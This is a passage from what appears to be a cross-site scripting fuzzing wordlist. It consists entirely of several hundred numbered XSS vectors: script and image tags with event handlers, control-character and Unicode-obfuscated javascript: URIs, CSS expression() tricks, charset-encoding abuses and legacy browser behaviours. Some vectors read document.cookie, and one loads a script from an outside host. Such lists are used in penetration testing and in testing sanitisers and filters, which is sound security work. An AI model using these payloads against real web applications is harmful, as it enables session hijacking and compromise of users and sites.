  1685. <script>/* *\x2A/javascript:alert(1)// */</script>
  1686. <script>/* *\x00/javascript:alert(1)// */</script>
  1687. <style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>
  1688. <style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>
  1689. <style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style>
  1690. <style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style>
  1691. <style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>
  1692. "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF
  1693. "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF
  1694. <script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>
  1695. <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
  1696. <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>
  1697. '`"><\x3Cscript>javascript:alert(1)</script>
  1698. '`"><\x00script>javascript:alert(1)</script>
  1699. "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
  1700. "'`><\x00img src=xxx:x onerror=javascript:alert(1)>
  1701. <script src="data:text/plain\x2Cjavascript:alert(1)"></script>
  1702. <script src="data:\xD4\x8F,javascript:alert(1)"></script>
  1703. <script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>
  1704. <script src="data:\xCB\x8F,javascript:alert(1)"></script>
  1705. <script\x20type="text/javascript">javascript:alert(1);</script>
  1706. <script\x3Etype="text/javascript">javascript:alert(1);</script>
  1707. <script\x0Dtype="text/javascript">javascript:alert(1);</script>
  1708. <script\x09type="text/javascript">javascript:alert(1);</script>
  1709. <script\x0Ctype="text/javascript">javascript:alert(1);</script>
  1710. <script\x2Ftype="text/javascript">javascript:alert(1);</script>
  1711. <script\x0Atype="text/javascript">javascript:alert(1);</script>
  1712. ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
  1713. ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
  1714. ABC<div style="x:expression\x00(javascript:alert(1)">DEF
  1715. ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
  1716. ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
  1717. ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
  1718. ABC<div style="x:\x09expression(javascript:alert(1)">DEF
  1719. ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
  1720. ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
  1721. ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
  1722. ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
  1723. ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
  1724. ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
  1725. ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
  1726. ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
  1727. ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
  1728. ABC<div style="x:\x20expression(javascript:alert(1)">DEF
  1729. ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
  1730. ABC<div style="x:\x00expression(javascript:alert(1)">DEF
  1731. ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
  1732. ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
  1733. ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
  1734. ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
  1735. ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
  1736. ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
  1737. ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
  1738. ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
  1739. <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1740. <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1741. <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1742. <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1743. <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1744. <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1745. <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1746. <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1747. <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1748. <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1749. <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1750. <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1751. <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1752. <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1753. <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1754. <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1755. <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1756. <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1757. <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1758. <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1759. <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1760. <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1761. <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1762. <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1763. <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1764. <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1765. <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1766. <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1767. <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1768. <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1769. <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1770. <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1771. <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1772. <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1773. <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1774. <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1775. <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1776. <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1777. <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1778. <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1779. <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1780. <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1781. <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1782. <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1783. <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1784. <a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1785. <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1786. <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1787. <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1788. <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1789. <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1790. <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  1791. <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
  1792. <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
  1793. <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
  1794. <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
  1795. <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
  1796. `"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
  1797. `"'><img src=xxx:x \x22onerror=javascript:alert(1)>
  1798. `"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
  1799. `"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
  1800. `"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
  1801. `"'><img src=xxx:x \x09onerror=javascript:alert(1)>
  1802. `"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
  1803. `"'><img src=xxx:x \x00onerror=javascript:alert(1)>
  1804. `"'><img src=xxx:x \x27onerror=javascript:alert(1)>
  1805. `"'><img src=xxx:x \x20onerror=javascript:alert(1)>
  1806. "`'><script>\x3Bjavascript:alert(1)</script>
  1807. "`'><script>\x0Djavascript:alert(1)</script>
  1808. "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
  1809. "`'><script>\xE2\x80\x81javascript:alert(1)</script>
  1810. "`'><script>\xE2\x80\x84javascript:alert(1)</script>
  1811. "`'><script>\xE3\x80\x80javascript:alert(1)</script>
  1812. "`'><script>\x09javascript:alert(1)</script>
  1813. "`'><script>\xE2\x80\x89javascript:alert(1)</script>
  1814. "`'><script>\xE2\x80\x85javascript:alert(1)</script>
  1815. "`'><script>\xE2\x80\x88javascript:alert(1)</script>
  1816. "`'><script>\x00javascript:alert(1)</script>
  1817. "`'><script>\xE2\x80\xA8javascript:alert(1)</script>
  1818. "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
  1819. "`'><script>\xE1\x9A\x80javascript:alert(1)</script>
  1820. "`'><script>\x0Cjavascript:alert(1)</script>
  1821. "`'><script>\x2Bjavascript:alert(1)</script>
  1822. "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
  1823. "`'><script>-javascript:alert(1)</script>
  1824. "`'><script>\x0Ajavascript:alert(1)</script>
  1825. "`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
  1826. "`'><script>\x7Ejavascript:alert(1)</script>
  1827. "`'><script>\xE2\x80\x87javascript:alert(1)</script>
  1828. "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
  1829. "`'><script>\xE2\x80\xA9javascript:alert(1)</script>
  1830. "`'><script>\xC2\x85javascript:alert(1)</script>
  1831. "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
  1832. "`'><script>\xE2\x80\x83javascript:alert(1)</script>
  1833. "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
  1834. "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
  1835. "`'><script>\xE2\x80\x80javascript:alert(1)</script>
  1836. "`'><script>\x21javascript:alert(1)</script>
  1837. "`'><script>\xE2\x80\x82javascript:alert(1)</script>
  1838. "`'><script>\xE2\x80\x86javascript:alert(1)</script>
  1839. "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
  1840. "`'><script>\x0Bjavascript:alert(1)</script>
  1841. "`'><script>\x20javascript:alert(1)</script>
  1842. "`'><script>\xC2\xA0javascript:alert(1)</script>
  1843. "/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
  1844. "/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
  1845. "/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
  1846. "/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
  1847. "/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
  1848. "/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
  1849. "/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
  1850. "/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
  1851. "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
  1852. <script\x2F>javascript:alert(1)</script>
  1853. <script\x20>javascript:alert(1)</script>
  1854. <script\x0D>javascript:alert(1)</script>
  1855. <script\x0A>javascript:alert(1)</script>
  1856. <script\x0C>javascript:alert(1)</script>
  1857. <script\x00>javascript:alert(1)</script>
  1858. <script\x09>javascript:alert(1)</script>
  1859. `"'><img src=xxx:x onerror\x0B=javascript:alert(1)>
  1860. `"'><img src=xxx:x onerror\x00=javascript:alert(1)>
  1861. `"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
  1862. `"'><img src=xxx:x onerror\x0D=javascript:alert(1)>
  1863. `"'><img src=xxx:x onerror\x20=javascript:alert(1)>
  1864. `"'><img src=xxx:x onerror\x0A=javascript:alert(1)>
  1865. `"'><img src=xxx:x onerror\x09=javascript:alert(1)>
  1866. <script>javascript:alert(1)<\x00/script>
  1867. <img src=# onerror\x3D"javascript:alert(1)" >
  1868. <input onfocus=javascript:alert(1) autofocus>
  1869. <input onblur=javascript:alert(1) autofocus><input autofocus>
  1870. <video poster=javascript:javascript:alert(1)//
  1871. <body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  1872. <form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
  1873. <video><source onerror="javascript:javascript:alert(1)">
  1874. <video onerror="javascript:javascript:alert(1)"><source>
  1875. <form><button formaction="javascript:javascript:alert(1)">X
  1876. <body oninput=javascript:alert(1)><input autofocus>
  1877. <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
  1878. <frameset onload=javascript:alert(1)>
  1879. <table background="javascript:javascript:alert(1)">
  1880. <!--<img src="--><img src=x onerror=javascript:alert(1)//">
  1881. <comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
  1882. <![><img src="]><img src=x onerror=javascript:alert(1)//">
  1883. <style><img src="</style><img src=x onerror=javascript:alert(1)//">
  1884. <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
  1885. <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
  1886. <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
  1887. <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
  1888. <object data="data:text/html;base64,%(base64)s">
  1889. <embed src="data:text/html;base64,%(base64)s">
  1890. <b <script>alert(1)</script>0
  1891. <div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
  1892. <x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
  1893. <embed src="javascript:alert(1)">
  1894. <img src="javascript:alert(1)">
  1895. <image src="javascript:alert(1)">
  1896. <script src="javascript:alert(1)">
  1897. <div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
  1898. <? foo="><script>javascript:alert(1)</script>">
  1899. <! foo="><script>javascript:alert(1)</script>">
  1900. </ foo="><script>javascript:alert(1)</script>">
  1901. <? foo="><x foo='?><script>javascript:alert(1)</script>'>">
  1902. <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
  1903. <% foo><x foo="%><script>javascript:alert(1)</script>">
  1904. <div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
  1905. <img \x00src=x onerror="alert(1)">
  1906. <img \x47src=x onerror="javascript:alert(1)">
  1907. <img \x11src=x onerror="javascript:alert(1)">
  1908. <img \x12src=x onerror="javascript:alert(1)">
  1909. <img\x47src=x onerror="javascript:alert(1)">
  1910. <img\x10src=x onerror="javascript:alert(1)">
  1911. <img\x13src=x onerror="javascript:alert(1)">
  1912. <img\x32src=x onerror="javascript:alert(1)">
  1913. <img\x47src=x onerror="javascript:alert(1)">
  1914. <img\x11src=x onerror="javascript:alert(1)">
  1915. <img \x47src=x onerror="javascript:alert(1)">
  1916. <img \x34src=x onerror="javascript:alert(1)">
  1917. <img \x39src=x onerror="javascript:alert(1)">
  1918. <img \x00src=x onerror="javascript:alert(1)">
  1919. <img src\x09=x onerror="javascript:alert(1)">
  1920. <img src\x10=x onerror="javascript:alert(1)">
  1921. <img src\x13=x onerror="javascript:alert(1)">
  1922. <img src\x32=x onerror="javascript:alert(1)">
  1923. <img src\x12=x onerror="javascript:alert(1)">
  1924. <img src\x11=x onerror="javascript:alert(1)">
  1925. <img src\x00=x onerror="javascript:alert(1)">
  1926. <img src\x47=x onerror="javascript:alert(1)">
  1927. <img src=x\x09onerror="javascript:alert(1)">
  1928. <img src=x\x10onerror="javascript:alert(1)">
  1929. <img src=x\x11onerror="javascript:alert(1)">
  1930. <img src=x\x12onerror="javascript:alert(1)">
  1931. <img src=x\x13onerror="javascript:alert(1)">
  1932. <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
  1933. <img src=x onerror=\x09"javascript:alert(1)">
  1934. <img src=x onerror=\x10"javascript:alert(1)">
  1935. <img src=x onerror=\x11"javascript:alert(1)">
  1936. <img src=x onerror=\x12"javascript:alert(1)">
  1937. <img src=x onerror=\x32"javascript:alert(1)">
  1938. <img src=x onerror=\x00"javascript:alert(1)">
  1939. <a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
  1940. <img src="x` `<script>javascript:alert(1)</script>"` `>
  1941. <img src onerror /" '"= alt=javascript:alert(1)//">
  1942. <title onpropertychange=javascript:alert(1)></title><title title=>
  1943. <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
  1944. <!--[if]><script>javascript:alert(1)</script -->
  1945. <!--[if<img src=x onerror=javascript:alert(1)//]> -->
  1946. <script src="/\%(jscript)s"></script>
  1947. <script src="\\%(jscript)s"></script>
  1948. <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
  1949. <a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
  1950. <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
  1951. <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
  1952. <style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
  1953. <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a>
  1954. <style>*[{}@import'%(css)s?]</style>X
  1955. <div style="font-family:'foo ;color:red;';">XXX
  1956. <div style="font-family:foo}color=red;">XXX
  1957. <// style=x:expression\28javascript:alert(1)\29>
  1958. <style>*{x:expression(javascript:alert(1))}</style>
  1959. <div style=content:url(%(svg)s)></div>
  1960. <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
  1961. <div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
  1962. <div style="background:url(/f#oo/;color:red/*/foo.jpg);">X
  1963. <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
  1964. <div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
  1965. <x style="background:url('x ;color:red;/*')">XXX</x>
  1966. <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
  1967. <script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
  1968. <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
  1969. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
  1970. <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
  1971. <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
  1972. <meta charset="mac-farsi"script¾javascript:alert(1)¼/script¾
  1973. X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
  1974. 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>
  1975. 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>
  1976. <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
  1977. 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
  1978. <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
  1979. <x style="behavior:url(%(sct)s)">
  1980. <xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
  1981. <event-source src="%(event)s" onload="javascript:alert(1)">
  1982. <a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
  1983. <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img src=x:x onerror =javascript:alert(1)&gt;">
  1984. <script>%(payload)s</script>
  1985. <script src=%(jscript)s></script>
  1986. <script language='javascript' src='%(jscript)s'></script>
  1987. <script>javascript:alert(1)</script>
  1988. <IMG SRC="javascript:javascript:alert(1);">
  1989. <IMG SRC=javascript:javascript:alert(1)>
  1990. <IMG SRC=`javascript:javascript:alert(1)`>
  1991. <SCRIPT SRC=%(jscript)s?<B>
  1992. <FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
  1993. <BODY ONLOAD=javascript:alert(1)>
  1994. <BODY ONLOAD=javascript:javascript:alert(1)>
  1995. <IMG SRC="jav ascript:javascript:alert(1);">
  1996. <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
  1997. <SCRIPT/SRC="%(jscript)s"></SCRIPT>
  1998. <<SCRIPT>%(payload)s//<</SCRIPT>
  1999. <IMG SRC="javascript:javascript:alert(1)"
  2000. <iframe src=%(scriptlet)s <
  2001. <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
  2002. <IMG DYNSRC="javascript:javascript:alert(1)">
  2003. <IMG LOWSRC="javascript:javascript:alert(1)">
  2004. <BGSOUND SRC="javascript:javascript:alert(1);">
  2005. <BR SIZE="&{javascript:alert(1)}">
  2006. <LAYER SRC="%(scriptlet)s"></LAYER>
  2007. <LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
  2008. <STYLE>@import'%(css)s';</STYLE>
  2009. <META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
  2010. <XSS STYLE="behavior: url(%(htc)s);">
  2011. <STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS
  2012. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
  2013. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
  2014. <IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
  2015. <TABLE BACKGROUND="javascript:javascript:alert(1)">
  2016. <TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
  2017. <DIV STYLE="background-image: url(javascript:javascript:alert(1))">
  2018. <DIV STYLE="width:expression(javascript:alert(1));">
  2019. <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">
  2020. <XSS STYLE="xss:expression(javascript:alert(1))">
  2021. <STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
  2022. <STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A>
  2023. <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
  2024. <!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
  2025. <BASE HREF="javascript:javascript:alert(1);//">
  2026. <OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
  2027. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
  2028. <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  2029. <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML>
  2030. <SCRIPT SRC="%(jpg)s"></SCRIPT>
  2031. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
  2032. <form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
  2033. <body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  2034. <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
  2035. <STYLE>@import'%(css)s';</STYLE>
  2036. <STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
  2037. <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
  2038. <SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
  2039. <style onreadystatechange=javascript:javascript:alert(1);></style>
  2040. <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
  2041. <embed code=%(scriptlet)s></embed>
  2042. <embed code=javascript:javascript:alert(1);></embed>
  2043. <embed src=%(jscript)s></embed>
  2044. <frameset onload=javascript:javascript:alert(1)></frameset>
  2045. <object onerror=javascript:javascript:alert(1)>
  2046. <embed type="image" src=%(scriptlet)s></embed>
  2047. <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
  2048. <IMG SRC=&{javascript:alert(1);};>
  2049. <a href="jav&#65ascript:javascript:alert(1)">test1</a>
  2050. <a href="jav&#97ascript:javascript:alert(1)">test1</a>
  2051. <embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed>
  2052. <iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">
  2053. ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
  2054. alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
  2055. ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  2056. '';!--"<XSS>=&{()}
  2057. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  2058. <IMG SRC="javascript:alert('XSS');">
  2059. <IMG SRC=javascript:alert('XSS')>
  2060. <IMG SRC=JaVaScRiPt:alert('XSS')>
  2061. <IMG SRC=javascript:alert("XSS")>
  2062. <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
  2063. <a onmouseover="alert(document.cookie)">xxs link</a>
  2064. <a onmouseover=alert(document.cookie)>xxs link</a>
  2065. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  2066. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  2067. <IMG SRC=# onmouseover="alert('xxs')">
  2068. <IMG SRC= onmouseover="alert('xxs')">
  2069. <IMG onmouseover="alert('xxs')">
  2070. <IMG SRC=javascript:alert('XSS')>
  2071. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
